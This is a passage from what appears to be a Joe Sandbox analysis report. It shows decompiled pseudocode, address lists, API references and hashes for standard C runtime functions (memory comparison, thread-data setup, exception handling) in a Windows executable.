						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}

0x0040995d
0x0040995d
0x00409963
0x004099d6
0x004099d8
0x004099da
0x00000000
0x00000000
0x004099e0
0x004099e6
0x00409a65
0x00409a67
0x00409a69
0x00000000
0x00000000
0x00409a6f
0x00409a75
0x00409af4
0x00409af6
0x00409af8
0x00000000
0x00000000
0x00409afe
0x00409b04
0x00409b83
0x00409b85
0x00409b87
0x00000000
0x00000000
0x00409b93
0x00409c13
0x00409c15
0x00409c17
0x00000000
0x00000000
0x00409c1d
0x00409c23
0x00409ca2
0x00409ca4
0x00409ca6
0x00000000
0x00000000
0x00409cac
0x00409cb2
0x00409d23
0x00409d25
0x00409d27
0x00409d29
0x00409d29
0x00409d2b
0x0040aa87
0x0040aa87
0x00409cbb
0x00409cbd
0x00409cce
0x00409cd6
0x00409cd8
0x00409ce9
0x00409cf1
0x00409cf3
0x00409d08
0x00409d10
0x00409d12
0x00409d1f
0x00409d1f
0x00000000
0x00409d12
0x00409cfc
0x00409d02
0x00000000
0x00000000
0x00409d04
0x00409d04
0x00000000
0x00409d04
0x00409ce1
0x00409ce7
0x00000000
0x00000000
0x00000000
0x00409ce7
0x00409cc6
0x00409ccc
0x00000000
0x00000000
0x00000000
0x00409ccc
0x00409c2c
0x00409c2e
0x00409c45
0x00409c4d
0x00409c4f
0x00409c66
0x00409c6e
0x00409c70
0x00409c87
0x00409c8f
0x00409c91
0x00409c9e
0x00409c9e
0x00000000
0x00409c91
0x00409c7d
0x00409c81
0x00000000
0x00000000
0x00000000
0x00409c81
0x00409c5c
0x00409c60
0x00000000
0x00000000
0x00000000
0x00409c60
0x00409c3b
0x00409c3f
0x00000000
0x00000000
0x00000000
0x00409c3f
0x00409b9d
0x00409b9f
0x00409bb6
0x00409bbe
0x00409bc0
0x00409bd7
0x00409bdf
0x00409be1
0x00409bf8
0x00409c00
0x00409c02
0x00409c0f
0x00409c0f
0x00000000
0x00409c02
0x00409bee
0x00409bf2
0x00000000
0x00000000
0x00000000
0x00409bf2
0x00409bcd
0x00409bd1
0x00000000
0x00000000
0x00000000
0x00409bd1
0x00409bac
0x00409bb0
0x00000000
0x00000000
0x00000000
0x00409bb0
0x00409b0d
0x00409b0f
0x00409b26
0x00409b2e
0x00409b30
0x00409b47
0x00409b4f
0x00409b51
0x00409b68
0x00409b70
0x00409b72
0x00409b7f
0x00409b7f
0x00000000
0x00409b72
0x00409b5e
0x00409b62
0x00000000
0x00000000
0x00000000
0x00409b62
0x00409b3d
0x00409b41
0x00000000
0x00000000
0x00000000
0x00409b41
0x00409b1c
0x00409b20
0x00000000
0x00000000
0x00000000
0x00409b20
0x00409a7e
0x00409a80
0x00409a97
0x00409a9f
0x00409aa1
0x00409ab8
0x00409ac0
0x00409ac2
0x00409ad9
0x00409ae1
0x00409ae3
0x00409af0
0x00409af0
0x00000000
0x00409ae3
0x00409acf
0x00409ad3
0x00000000
0x00000000
0x00000000
0x00409ad3
0x00409aae
0x00409ab2
0x00000000
0x00000000
0x00000000
0x00409ab2
0x00409a8d
0x00409a91
0x00000000
0x00000000
0x00000000
0x00409a91
0x004099ef
0x004099f1
0x00409a08
0x00409a10
0x00409a12
0x00409a29
0x00409a31
0x00409a33
0x00409a4a
0x00409a52
0x00409a54
0x00409a61
0x00409a61
0x00000000
0x00409a54
0x00409a40
0x00409a44
0x00000000
0x00000000
0x00000000
0x00409a44
0x00409a1f
0x00409a23
0x00000000
0x00000000
0x00000000
0x00409a23
0x004099fe
0x00409a02
0x00000000
0x00000000
0x00000000
0x00409965
0x00409965
0x00409968
0x0040996c
0x0040996e
0x00409981
0x00409981
0x00409985
0x00409989
0x0040998b
0x0040999e
0x0040999e
0x004099a2
0x004099a6
0x004099a8
0x004099bb
0x004099bb
0x004099bf
0x004099c3
0x004099c5
0x004099cb
0x004099ce
0x004099d2
0x004099d2
0x00000000
0x004099c5
0x004099ae
0x004099b1
0x004099b5
0x004099b9
0x00000000
0x00000000
0x00000000
0x004099b9
0x00409991
0x00409994
0x00409998
0x0040999c
0x00000000
0x00000000
0x00000000
0x0040999c
0x00409974
0x00409977
0x0040997b
0x0040997f
0x00000000
0x00000000
0x00000000
0x0040997f
0x00409956
0x00409956
0x00000000

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 28bbc9eee06369bd84a56fb36a9b92cd35d64b1f4906ce646d0fa8278c867559
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 1EC15EB3D0A9B30AC775812E416812BEEA26FD165031EC3B69CE83F3CED13A5D0196D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041B154 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction ID: 4846ecdc97f6051c49a183e7a0df1eb7adb92a64571d61eeb72e4ce797d40a87
Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction Fuzzy Hash: DDE0DF32650104ABC7219A0ADC40DC3F7E9FB987F070A4426FD8483620C334FC40C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAA9 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E0040CAA9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x419e28);
				E0040EACC(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040DD15(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x418600;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x43d570;
				E004100B0(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E0040CB7E();
				E004100B0(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x43db78; // 0x43daa0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E0040F6B9( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040EB11(E0040CB87());
			}

0x0040caa9
0x0040caa9
0x0040caab
0x0040cab0
0x0040cab5
0x0040cabb
0x0040cac3
0x0040cac6
0x0040cacb
0x0040cacc
0x0040cacf
0x0040cad2
0x0040cadc
0x0040cae1
0x0040cae9
0x0040caf1
0x0040cb01
0x0040cb01
0x0040cb07
0x0040cb0a
0x0040cb11
0x0040cb18
0x0040cb21
0x0040cb27
0x0040cb2e
0x0040cb34
0x0040cb3b
0x0040cb42
0x0040cb48
0x0040cb4b
0x0040cb4e
0x0040cb53
0x0040cb55
0x0040cb5a
0x0040cb5a
0x0040cb60
0x0040cb66
0x0040cb77

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00419E28,0000000C,0040CBE4,00000000,00000000,?,?,0040D949,0040BC72,?,00407D8A,?,?), ref: 0040CABB
__crt_waiting_on_module_handle.LIBCMT ref: 0040CAC6

Part of subcall function 0040DD15: Sleep.KERNEL32(000003E8,00000000,?,0040CA0C,KERNEL32.DLL,?,0040CA58,?,?,0040D949,0040BC72,?,00407D8A,?,?), ref: 0040DD21
Part of subcall function 0040DD15: GetModuleHandleW.KERNEL32(?,?,0040CA0C,KERNEL32.DLL,?,0040CA58,?,?,0040D949,0040BC72,?,00407D8A,?,?), ref: 0040DD2A

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040CAEF
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040CAFF
__lock.LIBCMT ref: 0040CB21
InterlockedIncrement.KERNEL32(0043D570), ref: 0040CB2E
__lock.LIBCMT ref: 0040CB42
___addlocaleref.LIBCMT ref: 0040CB60

Strings

KERNEL32.DLL, xrefs: 0040CAB5, 0040CABA, 0040CAC5
EncodePointer, xrefs: 0040CAE3
DecodePointer, xrefs: 0040CAF7

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: bb392ba37dc3867d0aa2a5ca7741670f5f10efbde4ef453536be4effb5d4a5f8
Instruction ID: df68ae728dec22735fafa47acde2b6711487b4767884d2cf8666cd7cb627f573
Opcode Fuzzy Hash: bb392ba37dc3867d0aa2a5ca7741670f5f10efbde4ef453536be4effb5d4a5f8
Instruction Fuzzy Hash: B0116371944701DED720EF76E842B9ABBF0AF44318F10456FE599A32D0CB78A981CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFE9 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040BFE9(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x419d88);
				E0040EACC(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00409337(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040CC09(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040CC09(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E0040CC09(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0040CC09(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E004093DC(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0040C10F(_t48, _t53, _t55, _t57, _t61);
				return E0040EB11( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x0040bfe9
0x0040bfe9
0x0040bfe9
0x0040bfeb
0x0040bff0
0x0040bff5
0x0040bff7
0x0040bffa
0x0040bffd
0x0040c000
0x0040c007
0x0040c018
0x0040c026
0x0040c034
0x0040c03c
0x0040c04a
0x0040c050
0x0040c057
0x0040c05a
0x0040c070
0x0040c073
0x0040c0e8
0x0040c0ef
0x0040c0f6
0x0040c103

APIs

__CreateFrameInfo.LIBCMT ref: 0040C011

Part of subcall function 00409337: __getptd.LIBCMT ref: 00409345
Part of subcall function 00409337: __getptd.LIBCMT ref: 00409353

__getptd.LIBCMT ref: 0040C01B

Part of subcall function 0040CC09: __getptd_noexit.LIBCMT ref: 0040CC0C
Part of subcall function 0040CC09: __amsg_exit.LIBCMT ref: 0040CC19

__getptd.LIBCMT ref: 0040C029
__getptd.LIBCMT ref: 0040C037
__getptd.LIBCMT ref: 0040C042
_CallCatchBlock2.LIBCMT ref: 0040C068

Part of subcall function 004093DC: __CallSettingFrame@12.LIBCMT ref: 00409428

Part of subcall function 0040C10F: __getptd.LIBCMT ref: 0040C11E
Part of subcall function 0040C10F: __getptd.LIBCMT ref: 0040C12C

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 4b0ee41254c4ad0aacdeeea0173e8c29a2d7955d2bad69a96fc5289d5144500b
Instruction ID: c86e6f6ad5a32558d49623174a4978170b3d1c442de5eae79025e12db57b9452
Opcode Fuzzy Hash: 4b0ee41254c4ad0aacdeeea0173e8c29a2d7955d2bad69a96fc5289d5144500b
Instruction Fuzzy Hash: D511DA71D00209DFDB00EFA6D886BDD77B0FF08314F20856AF814A7292DB7999159F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040BD38(void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;
				void* _t25;

				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E0040CC09(_t23, __edx, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E0040CC09(_t23, __edx, _t25, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E0040CC09(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x419e78);
						E0040EACC(_t23, _t25, __esi);
						_t19 =  *((intOrPtr*)(E0040CC09(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0040EB11(E00410C98(_t23, _t24, _t25));
					}
				}
			}

0x0040bd38
0x0040bd42
0x0040bd49
0x0040bd68
0x0040bd6f
0x0040bd76
0x0040bd7b
0x0040bd7b
0x0040bd7b
0x00000000
0x0040bd4b
0x0040bd4b
0x0040bd50
0x0040bd7d
0x0040bd7d
0x0040bd80
0x0040bd52
0x0040bd57
0x0040cedf
0x0040cee1
0x0040cee6
0x0040cef0
0x0040cef5
0x0040cef7
0x0040cefb
0x0040cf06
0x0040cf06
0x0040cf17
0x0040cf17
0x0040bd50

APIs

__getptd.LIBCMT ref: 0040BD52

Part of subcall function 0040CC09: __getptd_noexit.LIBCMT ref: 0040CC0C
Part of subcall function 0040CC09: __amsg_exit.LIBCMT ref: 0040CC19

__getptd.LIBCMT ref: 0040BD63
__getptd.LIBCMT ref: 0040BD71

Strings

MOC, xrefs: 0040BD44
csm, xrefs: 0040BD4B

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 6a69b8f5c8b18aff45b5a37b3d7ff8c6bdade7de566d6e1b2d04b70bc962e377
Instruction ID: dd137202058278a0da384034707ae7a32f36257fd3c7ba0ff9a08e2cf41d5903
Opcode Fuzzy Hash: 6a69b8f5c8b18aff45b5a37b3d7ff8c6bdade7de566d6e1b2d04b70bc962e377
Instruction Fuzzy Hash: D7E04F75144204CFD710AB69C086B697395EF88318F2602B7E44DE73A3E77DD840958E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0B3 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040F0B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
